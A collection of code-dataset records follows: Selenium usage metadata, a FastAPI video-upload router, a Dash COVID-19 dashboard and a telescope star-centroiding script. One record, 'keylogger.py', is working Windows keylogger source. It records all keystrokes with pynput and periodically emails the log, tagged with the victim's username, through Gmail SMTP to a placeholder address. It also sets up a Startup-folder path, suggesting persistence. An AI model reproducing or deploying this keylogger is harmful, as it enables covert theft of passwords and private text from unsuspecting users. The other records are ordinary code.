"selenium.webdriver.common.by.By", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 24, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 24, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 28, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 28, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 32, 
"usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 33, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 34, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 36, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 36, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 37, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 37, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 38, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 40, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 40, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 41, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 42, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 42, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 43, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 45, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 45, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 47, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 47, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 48, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 48, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 
51, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 51, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 53, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 54, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 54, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 55, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 55, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.select.Select", "line_number": 79, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 121, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.select.Select", "line_number": 158, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 174, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 178, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 181, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 184, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 188, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 196, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 200, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 207, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 218, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 229, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 242, "usage_type": "call"}]} +{"seq_id": "336244656", "text": "from pynput.keyboard import Key, Listener\r\nimport os\r\nimport shutil\r\nimport time\r\nimport datetime\r\nimport winshell\r\nfrom win32com.client import Dispatch\r\nfrom shutil import copyfile\r\nimport tempfile\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.base import MIMEBase\r\nfrom email import encoders\r\nimport threading\r\nimport socket\r\n\r\nsave = tempfile.mkdtemp(\"screen\")\r\nprint(save)\r\ncwd = os.getcwd()\r\nsource = os.listdir()\r\n\r\ndateAndtime = datetime.datetime.now().strftime(\"-%Y-%m-%d-%H-%M-%S\")\r\nfilename = save+\"\\key_log\"+dateAndtime+\".txt\"\r\nopen(filename,\"w+\")\r\nkeys=[]\r\ncount = 0\r\ncountInternet = 0\r\nword = \"Key.\"\r\nusername = os.getlogin()\r\n\r\ndestination=r'C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'.format(username)\r\n\r\ndef is_connected():\r\n try:\r\n socket.create_connection((\"www.google.com\",80))\r\n return True\r\n except OSError:\r\n pass\r\n return False\r\n\r\ndef send_email():\r\n fromaddr = \"your email\"\r\n toaddr = \"your email\"\r\n password = \"your email pass\"\r\n msg = MIMEMultipart()\r\n msg['From'] = fromaddr\r\n msg['To'] = toaddr\r\n msg['Subject'] = username\r\n body = \"TEXT\"\r\n msg.attach(MIMEText(dateAndtime,'plain'))\r\n attachment = 
open(filename, \"rb\")\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload((attachment).read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\r\n msg.attach(part)\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.starttls()\r\n server.login(fromaddr, password)\r\n text = msg.as_string()\r\n server.sendmail(fromaddr,toaddr,text)\r\n server.quit\r\n\r\ndef write_file(keys):\r\n with open(filename,\"a\") as f:\r\n for key in keys:\r\n if key == 'Key.enter':\r\n f.write(\"\\n\")\r\n elif key == 'Key.space':\r\n f.write(key.replace(\"Key.space\",\" \"))\r\n elif key[:4] == word:\r\n pass\r\n else:\r\n f.write(key.replace(\"'\",\"\"))\r\n \r\ndef on_press(key):\r\n global keys, count, countInternet, filename\r\n keys.append(str(key))\r\n\r\n if len(keys) > 10:\r\n write_file(keys)\r\n if is_connected():\r\n count += 1\r\n print('connected {}'.format(count))\r\n if count > 100:\r\n count = 0\r\n t1 = threading.Thread(target=send_email, name='t1')\r\n t1.start()\r\n else:\r\n countInternet += 1\r\n print('not connected',countInternet)\r\n if countInternet > 10:\r\n countInternet = 0\r\n filename = filename.strip(save)\r\n for files in save:\r\n if file == filename:\r\n shutil.copy(files+\"t\",source)\r\n\r\n keys.clear()\r\nwith Listener(on_press=on_press) as listener:\r\n listener.join()\r\n \r\n \r\n \r\n", "sub_path": "keylogger.py", "file_name": "keylogger.py", "file_ext": "py", "file_size_in_byte": 3049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tempfile.mkdtemp", "line_number": 18, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 20, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.getlogin", "line_number": 30, "usage_type": "call"}, {"api_name": "socket.create_connection", "line_number": 36, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 46, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 51, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 53, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 55, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 55, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 58, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 88, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 98, "usage_type": "call"}, {"api_name": "pynput.keyboard.Listener", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "396512606", "text": "import shutil\nfrom typing import List\nfrom fastapi import APIRouter, UploadFile, File, Form\nfrom schemas import UploadVideo, GetVideo\nfrom models import Video, User\n\nvideo_router = APIRouter()\n\n\n@video_router.post(\"/\")\nasync def create_video(title: str = Form(...), description: str = Form(...), file: UploadFile = File(...)):\n info = UploadVideo(title=title, description=description)\n with open(f'{file.filename}', \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n user = await User.objects.first()\n return await Video.objects.create(file=file.filename, user=user, 
**info.dict())\n\n\n@video_router.get(\"/video/{video_pk}\")\nasync def get_video(video_pk: int):\n video = await Video.objects.select_related(\"user\").get(pk=video_pk)\n return video\n", "sub_path": "api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 773, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "fastapi.APIRouter", "line_number": 7, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 11, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 11, "usage_type": "call"}, {"api_name": "fastapi.File", "line_number": 11, "usage_type": "call"}, {"api_name": "schemas.UploadVideo", "line_number": 12, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 14, "usage_type": "call"}, {"api_name": "models.User.objects.first", "line_number": 15, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Video.objects.create", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Video.objects.select_related", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "321770988", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 3 18:16:12 2020\r\n\r\n@author: Annie\r\n\"\"\"\r\n#import os\r\n#from random import randint\r\n#import flask\r\nimport dash\r\nimport dash_bootstrap_components as dbc\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport pandas as pd\r\n#import numpy as np\r\nimport plotly.graph_objects as go\r\n#import plotly.express as px\r\nimport datetime\r\n\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']#, dbc.themes.BOOTSTRAP]\r\n\r\n#configure app - might need more research on external stylesheets\r\napp = dash.Dash(__name__, external_stylesheets = [dbc.themes.BOOTSTRAP])\r\nserver = app.server\r\napp.config.suppress_callback_exceptions = True\r\napp.title='MSDS498'\r\n\r\n#data setup\r\nus_data = pd.read_json(path_or_buf='https://covidtracking.com/api/us/daily')\r\nstate_data = pd.read_json(path_or_buf='https://covidtracking.com/api/states/daily')\r\nstate_data['date'] = state_data['date'].astype(str)\r\nus_data['date'] = us_data['date'].astype(str)\r\nstate_data['date'] = state_data.apply(lambda x: datetime.datetime.strptime(x['date'], '%Y%m%d'), axis = 1)\r\nus_data['date'] = us_data.apply(lambda x: datetime.datetime.strptime(x['date'], '%Y%m%d'), axis = 1)\r\n\r\nstates = sorted(set(state_data['state']))\r\ngeo_values = ['positive', 'hospitalized','recovered', 'death', 'totalTestResults', 'positiveIncrease', 'deathIncrease', 'hospitalizedIncrease']\r\nrecent_date = max(state_data['date'])\r\nrecent_state_data = state_data.loc[state_data['date'] == recent_date]\r\nrecent_us_data = us_data.loc[us_data['date'] == recent_date]\r\n\r\n#MA WOW\r\nSevenDaysBack = recent_date + datetime.timedelta(days=-7)\r\nFourteenDaysBack = recent_date + datetime.timedelta(days=-14)\r\ndf_State_PastWeek = state_data[state_data['date']>=SevenDaysBack ]\r\ndf_State_PriorPastWeek = 
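The api.py record above wires multipart form fields to a FastAPI endpoint: `Form(...)` for the text fields, `File(...)`/`UploadFile` for the payload, and `shutil.copyfileobj` to persist it. A minimal client sketch for exercising such an endpoint; the base URL, mount prefix, and file name are assumptions, not part of the record.

```python
# Hypothetical client for the upload endpoint in the api.py record above.
# Assumes video_router is mounted at the application root and the server
# runs locally on port 8000; adjust the URL and file name to your setup.
import requests

with open("clip.mp4", "rb") as fh:  # placeholder file name
    resp = requests.post(
        "http://127.0.0.1:8000/",                               # create_video route ("/")
        data={"title": "demo", "description": "test upload"},   # Form fields
        files={"file": ("clip.mp4", fh, "video/mp4")},          # UploadFile
    )
print(resp.status_code, resp.json())
```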
state_data[(state_data['date']>=FourteenDaysBack) & (state_data['date']23} {:>32} {:>40} {:>25} {:>15} {:>9}\".format(\"Star\", \"Background\",\n \"Centroid width: 3\", \"5\", \"7\",\n \"TruePositions\", \"LoLeftCoords\",\n \"Magnitude\",\n \"MinDiff\")\n line0b = \"{:>25} {:>12} {:>16} {:>14} {:>16} {:>20} {:>16} {:>17} {:>11} {:>11} {:>16} {:>2}\".format(\n \"x\", \"y\", \"x\", \"y\", \"x\", \"y\",\n \"TrueX\", \"TrueY\", \"LoLeftX\", \"LoLeftY\",\n \"x\", \"y\")\n lines4screenandfile = [line0, line0a, line0b]\n # write the file\n positions = [\"_Position1\", \"_Position2\"]\n if save_text_file:\n for pos in positions:\n output_file = os.path.join(output_file_path, \"centroids_Scene\"+repr(scene)+bg_choice+pos+\".txt\")\n f = open(output_file, \"w+\")\n f.write(line0+\"\\n\")\n f.close()\n if keep_ugly_stars and not keep_bad_stars:\n for pos in positions:\n out_file_gduglies = os.path.join(output_file_path, \"centroids_Scene\"+repr(scene)+bg_choice+pos+\"_GoodAndUglies.txt\")\n f = open(out_file_gduglies, \"w+\")\n f.write(line0+\"\\n\")\n f.close()\n\n # get the star files to run the TA algorithm on\n dir2test_list = TAf.get_raw_star_directory(path4starfiles, scene, shutters, noise)\n\n # run centroid algorithm on each position and save them into a text file\n x13, x15, x17 = np.array([]), np.array([]), np.array([])\n y13, y15, y17 = np.array([]), np.array([]), np.array([])\n x23, x25, x27 = np.array([]), np.array([]), np.array([])\n y23, y25, y27 = np.array([]), np.array([]), np.array([])\n min_diff_pixposX, min_diff_pixposY, mag_list = [], [], []\n loleftcoords_listX, loleftcoords_listY = [], []\n true_centerX, true_centerY = [], []\n\n for pos, dir2test in zip(positions, dir2test_list):\n dir_stars = glob(os.path.join(dir2test,\"postageout_star_*.fits\")) # get all star fits files in that directory\n #print(\"does dir2test exist?\", os.path.isdir(dir2test))\n for star in dir_stars:\n dir_star_number = int(os.path.basename(star).split()[1])\n # Test stars of detector of choice\n for st in stars_sample:\n if st == dir_star_number: #if str(st)+\" quad_ \" in star:\n if verbose:\n print (\"Will test stars in directory: \\n \", dir2test)\n print (\"Star: \", os.path.basename(star))\n # Make sure the file actually exists\n star_exists = os.path.isfile(star)\n if not star_exists:\n print (\"The file: \", star, \"\\n does NOT exist. Exiting the script.\")\n exit()\n\n # Obtain real star position and corresponding detector\n if st <= 100:\n detector = detectors[1]\n else:\n detector = detectors[0]\n idx_star = stars_sample.index(st)\n mag_i = magnitudes[idx_star]\n true_center_fulldet = [bench_xP1[idx_star], bench_yP1[idx_star]]\n\n #!!! WE ARE NOT USING POSITIONS 2 (SHIFTED) BECAUSE WE ARE FIXING POSITION 1 AS\n # REFERENCE POINT TO BEST REPRODUCE OBSERVATION MODE\n #if pos == \"_Position2\":\n # true_center_fulldet = [bench_xP2[idx_star], bench_yP2[idx_star]]\n\n # Read FITS image\n if verbose:\n print (\"Running centroid algorithm... 
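The Dash record breaks off above while building seven- and fourteen-day windows over the covidtracking.com state data. A hedged sketch of the week-over-week comparison that setup implies, assuming only the columns named in the visible code (`date`, `state`, `positiveIncrease`); note the covidtracking.com project has since been archived, so the feed URL may no longer resolve.

```python
# Sketch of a week-over-week comparison mirroring the truncated Dash record:
# fetch the daily-states feed, parse dates, and split the last 14 days into
# the past week and the week before it.
import datetime
import pandas as pd

state_data = pd.read_json("https://covidtracking.com/api/states/daily")
state_data["date"] = pd.to_datetime(state_data["date"].astype(str), format="%Y%m%d")

recent_date = state_data["date"].max()
week_ago = recent_date + datetime.timedelta(days=-7)
two_weeks_ago = recent_date + datetime.timedelta(days=-14)

past_week = state_data[state_data["date"] >= week_ago]
prior_week = state_data[(state_data["date"] >= two_weeks_ago)
                        & (state_data["date"] < week_ago)]

# Percent change in new positives per state, past week vs. the week before.
wow = (past_week.groupby("state")["positiveIncrease"].sum()
       / prior_week.groupby("state")["positiveIncrease"].sum() - 1.0) * 100.0
print(wow.sort_values(ascending=False).head())
```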
\")\n #hdr = fits.getheader(star, 0)\n #print(\"** HEADER:\", hdr)\n master_img = fits.getdata(star, 0)\n if verbose:\n print ('Master image shape: ', np.shape(master_img))\n # Obtain the combined FITS image that combines all frames into one image\n # background subtraction is done here\n psf = TAf.readimage(master_img, backgnd_subtraction_method, bg_method=background_method,\n bg_value=bg_value, bg_frac=bg_frac, verbose=verbose, debug=debug)\n cb_centroid_list_in32x32pix = TAf.run_recursive_centroids(psf, bg_frac, xwidth_list, ywidth_list,\n checkbox_size, max_iter, threshold,\n determine_moments, verbose, debug)\n\n corr_cb_centroid_list, loleftcoords, true_center32x32, differences_true_TA = TAf.centroid2fulldetector(cb_centroid_list_in32x32pix,\n true_center_fulldet, detector, perform_avgcorr=Pier_corr)\n if not output_full_detector:\n cb_centroid_list = cb_centroid_list_in32x32pix\n true_center = true_center32x32\n else:\n true_center = true_center_fulldet\n if show_centroids:\n print ('***** Measured centroids for centroid window sizes 3, 5, and 7, respectively:')\n print (' cb_centroid_list = ', corr_cb_centroid_list)\n print (' True center = ', true_center)\n\n # Show the display with the measured and true positions\n fig_name = os.path.join(\"../resultsXrandomstars\", \"centroid_displays/Star\"+repr(st)+\"_Scene\"+repr(scene)+bg_choice+pos+\".jpg\")\n # Display the combined FITS image that combines all frames into one image\n m_img = display_master_img\n if display_master_img:\n m_img = TAf.readimage(master_img, backgnd_subtraction_method=None, bg_method=None,\n bg_value=None, bg_frac=None, debug=False)\n TAf.display_centroids(detector, st, case, psf, true_center32x32, cb_centroid_list_in32x32pix,\n show_disp, vlim, savefile=save_centroid_disp, fig_name=fig_name, display_master_img=m_img)\n if pos == \"_Position2\":\n true_center_fulldetP2 = [bench_xP2[idx_star], bench_yP2[idx_star]]\n _, _, true_center32x32P2, _ = TAf.centroid2fulldetector(cb_centroid_list_in32x32pix,\n true_center_fulldetP2, detector, perform_avgcorr=Pier_corr)\n #print ('true_center32x32 P1:', true_center32x32)\n #print ('true_center32x32 P2:', true_center32x32P2)\n # the following correction is because the postage stamp is centered on position 1 even if the\n # the star moved to position 2.\n if st <= 100:\n true_center32x32P2[0] = true_center32x32P2[0]+1.0\n true_center32x32P2[1] = true_center32x32P2[1]+2.0\n else:\n true_center32x32P2[0] = true_center32x32P2[0]-1.0\n true_center32x32P2[1] = true_center32x32P2[1]-2.0\n #print ('true_center32x32 P2:', true_center32x32P2)\n #print ('cb_centroid_list_in32x32pix:')\n #print (cb_centroid_list_in32x32pix)\n TAf.display_centroids(detector, st, case, psf, true_center32x32P2, cb_centroid_list_in32x32pix,\n show_disp, vlim, savefile=save_centroid_disp, fig_name=fig_name, display_master_img=m_img)\n # Find the best centroid window size = minimum difference with true values\n min_diff, _ = TAf.get_mindiff(differences_true_TA[0][0], differences_true_TA[0][1], differences_true_TA[0][2])\n # Save output\n true_centerX.append(true_center[0])\n true_centerY.append(true_center[1])\n loleftcoords_listX.append(loleftcoords[0])\n loleftcoords_listY.append(loleftcoords[1])\n mag_list.append(mag_i)\n min_diff_pixposX.append(min_diff[0])\n min_diff_pixposY.append(min_diff[1])\n if pos == \"_Position1\":\n x13 = np.append(x13, corr_cb_centroid_list[0][0])\n x15 = np.append(x15, corr_cb_centroid_list[1][0])\n x17 = np.append(x17, corr_cb_centroid_list[2][0])\n y13 = np.append(y13, 
corr_cb_centroid_list[0][1])\n y15 = np.append(y15, corr_cb_centroid_list[1][1])\n y17 = np.append(y17, corr_cb_centroid_list[2][1])\n if pos == \"_Position2\":\n x23 = np.append(x23, corr_cb_centroid_list[0][0])\n x25 = np.append(x25, corr_cb_centroid_list[1][0])\n x27 = np.append(x27, corr_cb_centroid_list[2][0])\n y23 = np.append(y23, corr_cb_centroid_list[0][1])\n y25 = np.append(y25, corr_cb_centroid_list[1][1])\n y27 = np.append(y27, corr_cb_centroid_list[2][1])\n # Write output into text file\n position = \"_Position1\"\n x_pixpos = [x13, x15, x17]\n y_pixpos = [y13, y15, y17]\n if pos == \"_Position2\":\n x_pixpos = [x23, x25, x27]\n y_pixpos = [y23, y25, y27]\n position = \"_Position2\"\n true_centers = [true_centerX, true_centerY]\n loleftcoords_list = [loleftcoords_listX, loleftcoords_listY]\n output_file = os.path.join(output_file_path, \"centroids_Scene\"+repr(scene)+bg_choice+position+\".txt\")\n data2write = [x_pixpos, y_pixpos, true_centers, loleftcoords_list, mag_list, min_diff_pixposX, min_diff_pixposY]\n TAf.writePixPos(save_text_file, show_centroids, output_file, lines4screenandfile, stars_sample, background2use, data2write)\n\n if debug:\n print (\"Check that read BENCHMARK values correspond to expected for case: \", case)\n print (\"Star, xP1, yP1, V2P1, V3P1, xLP1, yLP1\")\n print (bench_starP1[0], bench_xP1[0], bench_yP1[0], bench_V2P1[0], bench_V3P1[0], bench_xLP1[0], bench_yLP1[0])\n print (\"Star, xP2, yP2, V2P2, V3P2, xLP2, yLP2\")\n print (bench_starP2[0], bench_xP2[0], bench_yP2[0], bench_V2P2[0], bench_V3P2[0], bench_xLP2[0], bench_yLP2[0])\n print (\"Check that read MEASURED values correspond to expected for the same case: \", case)\n print (\" -> reading measured info from: \", case)\n print (\"Star, BG, x13, y13, x15, y15, x17, y17, LoLeftP1 (x, y), TrueP1 (x, y)\")\n print (stars_sample[0], bg_choice, x13[0], y13[0], x15[0], y15[0], x17[0], y17[0], bench_xLP1[0], bench_yLP1[0], bench_xP1[0], bench_yP1[0])\n print (\"Star, BG, x23, y23, x25, y25, x27, y27, LoLeftP2 (x, y), TrueP2 (x, y)\")\n print (stars_sample[0], bg_choice, x23[0], y23[0], x25[0], y25[0], x27[0], y27[0], bench_xLP2[0], bench_yLP2[0], bench_xP2[0], bench_yP2[0])\n raw_input(\" * press enter to continue... 
\\n\")\n\n # show positions on screen\n line0 = \"\\n Centroid indexing starting at 1 !\"\n line0a = \"{:<5} {:<15} {:<16} {:>23} {:>30} {:>44} {:>17} {:>15}\".format(\"Star\", \"Background\",\n \"Centroid windows: 3\", \"5\", \"7\",\n \"TruePositions\", \"LoLeftCoords\",\n \"Mag\")\n line0b = \"{:>25} {:>12} {:>16} {:>14} {:>16} {:>14} {:>16} {:>18} {:>12} {:>10}\".format(\n \"x\", \"y\", \"x\", \"y\", \"x\", \"y\",\n \"TrueX\", \"TrueY\", \"LoLeftX\", \"LoLeftY\")\n print (\"Analyzing case: \", case)\n print (line0)\n print (line0a)\n print (line0b)\n for i, st in enumerate(stars_sample):\n line1 = \"{:<5} {:<10} {:<14} {:<16} {:<14} {:<16} {:<14} {:<16} {:<14} {:<16} {:<8} {:<12} {:<10.2f}\".format(\n int(st), background2use,\n x13[i], y13[i], x15[i], y15[i], x17[i], y17[i],\n bench_xP1[i]-bench_xLP1[i], bench_yP1[i]-bench_yLP1[i],\n bench_xLP1[i], bench_yLP1[i],\n magnitudes[i])\n print (line1)\n\n # compact results for functions\n P1P2data = [x13,y13, x23,y23, x15,y15, x25,y25, x17,y17, x27,y27]\n\n #plot_pixpos = True\n if plot_pixpos:\n # plot of sample residual x and y for positions 1 and 2\n fig1 = plt.figure(1, figsize=(12, 10))\n ax1 = fig1.add_subplot(111)\n #plt.suptitle(plot_title, fontsize=18, y=0.96)\n plt.title(case)\n plt.xlabel('X Residuals [Pixels]')\n plt.ylabel('Y Residuals [Pixels]')\n arrx, arry = x17-bench_xP1, y17-bench_yP1\n xP1 = [min(arrx)+min(arrx)*0.5, max(arrx)+max(arrx)*0.5]\n yP1 = [min(arry)+min(arry)*0.5, max(arry)+max(arry)*0.5]\n arrx, arry = x27-bench_xP2, y27-bench_yP2\n xP2 = [min(arrx)+min(arrx)*0.5, max(arrx)+max(arrx)*0.5]\n yP2 = [min(arry)+min(arry)*0.5, max(arry)+max(arry)*0.5]\n # determine qhich limit is larger in P1\n if xP1[1] > yP1[1]:\n larP1 = xP1[1]\n else:\n larP1 = yP1[1]\n if xP2[1] > yP2[1]:\n larP2 = xP2[1]\n else:\n larP2 = yP2[1]\n if larP1 > larP2:\n uplim = larP1\n lolim = -1 * larP1\n else:\n uplim = larP2\n lolim = -1 * larP2\n plt.xlim(lolim, uplim)\n plt.ylim(lolim, uplim)\n plt.hlines(0.0, lolim, uplim, colors='k', linestyles='dashed')\n plt.vlines(0.0, lolim, uplim, colors='k', linestyles='dashed')\n # plot measured positions\n plt.plot(x13-bench_xP1, y13-bench_yP1, 'b^', ms=10, alpha=0.5, label='CentroidWindow3_P1')\n plt.plot(x15-bench_xP1, y15-bench_yP1, 'go', ms=10, alpha=0.5, label='CentroidWindow5_P1')\n plt.plot(x17-bench_xP1, y17-bench_yP1, 'r*', ms=13, alpha=0.5, label='CentroidWindow7_P1')\n plt.plot(x23-bench_xP2, y23-bench_yP2, 'c^', ms=10, alpha=0.5, label='CentroidWindow3_P2')\n plt.plot(x25-bench_xP2, y25-bench_yP2, 'yo', ms=10, alpha=0.5, label='CentroidWindow5_P2')\n plt.plot(x27-bench_xP2, y27-bench_yP2, 'm*', ms=13, alpha=0.5, label='CentroidWindow7_P2')\n # Shrink current axis by 20%\n box = ax1.get_position()\n ax1.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax1.legend(loc='center left', bbox_to_anchor=(1, 0.5)) # put legend out of the plot box\n y_reject = [-1.0, 1.0]\n x_reject = [-1.0, 1.0]\n for si, xi, yi in zip(stars_sample, x13-bench_xP1, y13-bench_yP1):\n #if yi >= y_reject[1] or yi <= y_reject[0] or xi >= x_reject[1] or xi <= x_reject[0]:\n si = int(si)\n subxcoord = 5\n subycoord = 0\n side = 'left'\n plt.annotate('{}'.format(si), xy=(xi,yi), xytext=(subxcoord, subycoord), ha=side, textcoords='offset points')\n for si, xi, yi in zip(stars_sample, x23-bench_xP2, y23-bench_yP2):\n #if yi >= y_reject[1] or yi <= y_reject[0] or xi >= x_reject[1] or xi <= x_reject[0]:\n si = int(si)\n subxcoord = 5\n subycoord = 0\n side = 'left'\n plt.annotate('{}'.format(si), xy=(xi,yi), 
xytext=(subxcoord, subycoord), ha=side, textcoords='offset points')\n plt.show()\n return bg_choice, P1P2data, bench_starP1, benchmark_V2V3_sampleP1P2\n\n\ndef transformAndRunTest(stars_sample, path4results, primary_params, secondary_params,\n bg_choice, P1P2data, bench_starP1, benchmark_V2V3_sampleP1P2, plot_v2v3pos=True,\n extra_string=None):\n '''\n This function converts to sky for the X random star sample, and performs the given test.\n\n Args:\n primary_params: list, set of parameters specific to the case\n secondary_params: list, set of generic parameters\n bg_choice: string of the background method used\n P1P2data: list of pixel positions for centroid windows 3, 5, and 7 for both positions,\n P1P2data = [x13,y13, x23,y23, x15,y15, x25,y25, x17,y17, x27,y27]\n bench_starP1: list of the benchmark stars studied\n benchmark_V2V3_sampleP1P2: list of benchmark V2s and V3s,\n benchmark_V2V3_sampleP1P2 = [bench_V2P1, bench_V3P1, bench_V2P2, bench_V3P2]\n\n 